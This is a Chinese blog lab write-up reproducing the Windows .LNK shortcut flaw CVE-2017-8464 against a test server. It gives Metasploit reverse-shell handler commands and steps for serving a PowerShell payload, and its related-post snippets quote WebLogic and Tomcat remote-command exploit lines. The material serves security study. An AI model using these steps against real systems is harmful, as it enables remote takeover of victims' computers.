CVE-2017-8464(远程执行命令)漏洞

于 2023-03-07 18:44:55 发布
阅读量322 收藏
点赞数
文章标签: 网络安全 安全 windows 系统安全 安全威胁分析 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54735393/article/details/129388572
版权

1.实验目的: 复现CVE-2017-8464(远程执行命令)漏洞

2.实验内容:攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。

注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

3.实验条件:

①kali

②win server 2008

4.实验步骤:

(1).查看kali ip,192.168.64.144

(2).用metasploit创建一个反弹shell木马

(3)把1.ps1 移动到/var/www/html下 命令 cp/1.ps1 /var/www/html

(4)开启apache服务,然后访问127.0.0.1/1.ps1

(5)在靶机创建一个powershell快捷方式

(6).kali下创建监听反弹

启动msfconsole

use exploit/multi/handler

set PAYLOADwindows/x64/meterpreter/reverse_tcp

set LHOST 攻击机IP地址

set LPORT 9999

exploit 或run

5.实验心得:

利用U盘,网络共享等途径触发漏洞,该漏洞会完全控制用户系统,安全风险高危。

千冬季
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
震网三代(CVE-2017-8464
m0_57379855的博客
03-31 2273
震网三代(CVE-2017-8464CVE-2017-8464环境准备利用原理漏洞利用后渗透 CVE-2017-8464 说明: 2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 危害: 被攻击机插入存在攻击lnk的U盘后会反弹shell,
CVE-2017-8464(震网三代)漏洞分析与复现
dgjkkhcf的博客
07-22 3416
2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。......
CVE-2017-8464漏洞原理分析
RockHan
01-08 3458
CVE-2017-8464漏洞原理分析 CVE-2017-8464漏洞诞生 CVE-2017-8464 漏洞是MS15-020(CVE-2015-0096)的变体,可绕过MS10-046(CVE-2010-2568)和 MS15-020(CVE-2015-0096)。 CVE-2017-8464漏洞原理 Windows系统使用二进制解析 .LNK文件,当恶意二进...
CVE-2017-8464震网3.0漏洞分析与复现
weixin_45484297的博客
03-29 2020
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该漏洞的PoC。官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。本次实验主要分为漏洞复现和poc原理分析两部分,通过实验理清该漏洞可能的的攻击途径以及如何防护。 1.漏洞介绍 该漏洞的原理同2010年美国和以色列入
CVE-2017-8464漏洞复现
nicedreem的博客
02-14 124
CVE-2017-8464复现
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
在该版本固件中同时存在着个不安全认证漏洞CVE-2020-24580),在登录界输任意密码就可以成功访问路由器界通过组合这两个漏洞可以实现未授权的任意代码执漏
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 的复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到...
CVE-2017-8464 分析
weixin_30814319的博客
12-28 828
目录 CVE-2017-8464(stuxnet 3.0) 分析 0xFF 前言 0x00 分析工具 0x01 漏洞复现 1)、生成一个DLL用于测试 2)、构造一个恶意的lnk二进制文件 3)、RUA! ...
CVE-2017-8464 震网三代复现U盘利用
weixin_52777165的博客
01-16 525
一.影响版本 漏洞影响范围: Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 服务器系统: Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016 二.漏洞复现 攻击机:kali2019.4 IP:192.168.1.12 靶机:win10 IP:192.168.1.3 打开kali终端进入msfcon
【研究】震网三代漏洞
weixin_30414155的博客
08-29 256
一、 CVE-2017-8464远程命令执行漏洞(震网三代漏洞)复现 漏洞描述: 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限。 注释:...
利用CVE-2017-8464漏洞制作病毒U盘攻击
RockHan
01-09 2575
利用CVE-2017-8464漏洞制作病毒U盘 漏洞简介 在“震网行动”中攻击者利用LNK快捷方式漏洞成功入侵了工控系统,并进一步利用漏洞做摆渡攻击,入侵核心工控系统,LNK漏洞危害级别为高危,用户只要是浏览或查看了存 在病毒的LNK文件,不需要用户点击,就会执行入侵者构造好的恶意代码。 病毒U盘制作 使用kali中msfconsole攻击模块生成病毒U盘文件。 1、启动msfconso...
windbg 命令_CVE20178464:震网三代漏洞windbg动态调试
weixin_39845347的博客
12-12 395
漏洞历史2010年,攻击伊朗核工厂的漏洞利用工具就是“震网一代”,它因此被公认为世界上首个网络“超级破坏性武器”。2011年,“震网二代”蠕虫病毒出现,因为他会在临时目录下生成名为~DQ的随机文件,也被称作Duqu。2017年6月14日,微软在补丁中修补了一个快捷方式漏洞,也就是CVE-2017-8464漏洞,公告称此漏洞被国家背景的网络攻击所使用。该漏洞的原理同2010年美国和以色列入...
2021-08-27 网安实验-Windows系统渗透测试之LNK远程代码执行漏洞CVE-2017-8464
热门推荐
时光隧道
08-27 4万+
1. 关于漏洞 漏洞编号: CVE-2017-8464 漏洞名称: Microsoft Windows LNK 远程代码执行漏洞 官方评级: 高危 漏洞描述: 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 漏洞利用条件和方式:
MSF之CVE-2017-8464远程命令执行漏洞复现
极光时流
12-02 3265
MSF之CVE-2017-8464远程命令执行漏洞复现准备扫描漏洞 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107 攻击机:虚拟机kali系统,其IP为:192.168.1.111 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole cd 下载/ msfvenom -p windows...
CVE-2017-0199漏洞分析
一半西瓜的博客
04-17 4341
OFFICE OLE2LINK(CVE-2017-0199) 第一部分 OFFICE漏洞简介 1.1 微软office漏洞背景 1.2OFFICE OLE2LINK漏洞简介 第二部分 OFFICE OLE2LINK漏洞分析 2.1漏洞原理简单分析 2.2漏洞攻击原理简单图解 2.3相关知识介绍 第三部分 攻击代码分析 3.1 ms.rtf 3.2 配置文件 第四部分 利用复现过程 第五部分 攻击总结 参考资料
CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
kuiguowei的博客
01-16 1877
2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何
cve-2022-30190 msdt远程代码执行漏洞复现
最新发布
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值